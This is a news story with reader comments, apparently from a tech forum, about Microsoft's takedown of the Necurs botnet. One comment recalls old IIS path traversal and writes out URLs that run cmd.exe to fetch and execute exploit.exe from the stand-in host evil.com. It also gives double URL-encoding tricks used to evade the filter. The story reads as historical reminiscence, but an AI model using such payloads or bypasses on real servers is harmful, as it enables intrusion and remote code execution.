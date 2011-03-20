from the in-search-of-electronic-"brains!" dept.
Microsoft takes down millions of zombie bots:
Microsoft has said it was part of a team that dismantled an international network of zombie bots.
The network call Necurs infected over nine million computers and one of the world's largest botnets.
Necurs was responsible for multiple criminal scams including stealing personal information and sending fake pharmaceutical emails.
[...]Tom Burt, Microsoft's vice-president for customer security and trust, said in a blog post that the takedown of Necurs was the result of eight years of planning and co-ordination with partners in 35 countries.
He wrote that the steps taken will "ensure the criminals behind this network are no longer able to use key elements of its infrastructure to execute cyber-attacks."
[...]Necurs first appeared in 2012.
It is believed to have had a network of more than nine million zombie computers.
To grow this network Necurs used a domain generation algorithm that created random domain names the group turned into websites. It used these sites to send instructions to its army of infected computers.
Microsoft and its partners were able to crack Necurs' algorithm and predict what domain names it would be using in the months ahead and block them.
(Score: 0) by Anonymous Coward on Wednesday March 11, @02:46PM
Did MS push an update to their Win10 that brought them all down?
(Score: 2) by Runaway1956 on Wednesday March 11, @03:12PM (2 children)
Next up, you'll be declared a criminal for not upgrading to Win15, or whatever. If MS were truly interested in security, they would have baked security in, before they ever had a working OS. Kinda like *nix-like OS's.
Privacy policy: I only track people who have great buns. No, I'm not following any of you lard asses, so stop worrying
(Score: 3, Interesting) by DannyB on Wednesday March 11, @03:46PM
In Windows 95 Microsoft added, for the first time, an optional (laughable) login screen.
IIS runs (or once did run) effectively in kernel -- in an attempt to have the efficiency of Apache, without regard for security implications.
Self executing email viruses were a fun joke in the Usenet days. Microsoft made that joke into reality.
IIS mapped some path, I think it was like C:\inetpub\wwwroot as the root of web pages it served up. But, for no extra cost, they made it possible for a suitably crafted URL to crawl back up the pathname and into other areas of the filesystem.
http://some-stupid-iis-server.com/../../windows/system32/cmd.exe?/c+tftp.exe+evil.com/exploit.exe
http://some-stupid-iis-server.com/../../windows/system32/cmd.exe?/c+exploit.exe
(or something like that)
I remember demonstrating that to a coworker in 1999, on a newly installed, fully patched Windows NT 4.0 running IIS. Later you had to use some incantation like scripts/..%c0%af../winnt/. Later you couldn't use the dot-dot to walk back up the directory path. You had to replace each dot with %2E and each slash with %2F. So Microsoft fixed that, but you could then replace
%2E with %25%32%45 (eg, url-encode the percent, then the "2", then the "E")
%2F with %25%32%46
(this worked because IIS didn't see anything wrong, so it obeyed the first level of url-encode, then the Windows File System obeyed the 2nd level of url-encode!)
My what a security minded design they had. How about not running the web server in kernel, and not as root, and chrooting it to prevent any kind of escape mechanism out of the set of static web content that should be served?
Reminder: March is national procrastination week!
(Score: 2) by DannyB on Wednesday March 11, @03:48PM
As for Windows 15, I think they've said it will forever be Windows 10 going forward.
Just as Macintosh is OS X forever and ever.
Reminder: March is national procrastination week!
(Score: 1) by Kitsune008 on Wednesday March 11, @03:14PM
So, Microsoft took 9 million PC's running Windows offline.
Bully for them. /sarcasm
They should clean up their mess.